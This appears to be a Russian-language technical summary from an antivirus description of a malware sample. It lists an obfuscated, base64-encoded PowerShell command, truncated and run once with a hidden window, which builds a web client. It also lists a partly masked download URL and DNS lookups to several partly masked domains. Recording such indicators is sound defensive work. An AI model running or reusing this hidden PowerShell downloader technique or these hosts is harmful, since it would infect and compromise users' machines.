Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAQwBBADQAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYgBBAEMAUQBCACcALAAnAHcAJwApADsAJABSAEIAXwBBAGsAVQBBAF8APQBuAGUAdwBgAC0ATwBiAGAASgBgAEUAYwBUACAAKAAnAE4AZQB0AC4AVwAnACsAJwBlAG...
- http://ew##c.com/wp-snapshots/P_a/
- DNS ASK ew##c.com
- DNS ASK pe####profilers.vn
- DNS ASK 11##o.com
- DNS ASK wo######s.carelesscloud.com
- DNS ASK tr##ay.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAQwBBADQAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYgBBAEMAUQBCACcALAAnAHcAJwApADsAJABSAEIAXwBBAGsAVQBBAF8APQBuAGUAdwBgAC0ATwBiAGAASgBgAEUAYwBUACAAKAAnAE4AZQB0AC4AVwAnACsAJwBlAG...' (со скрытым окном)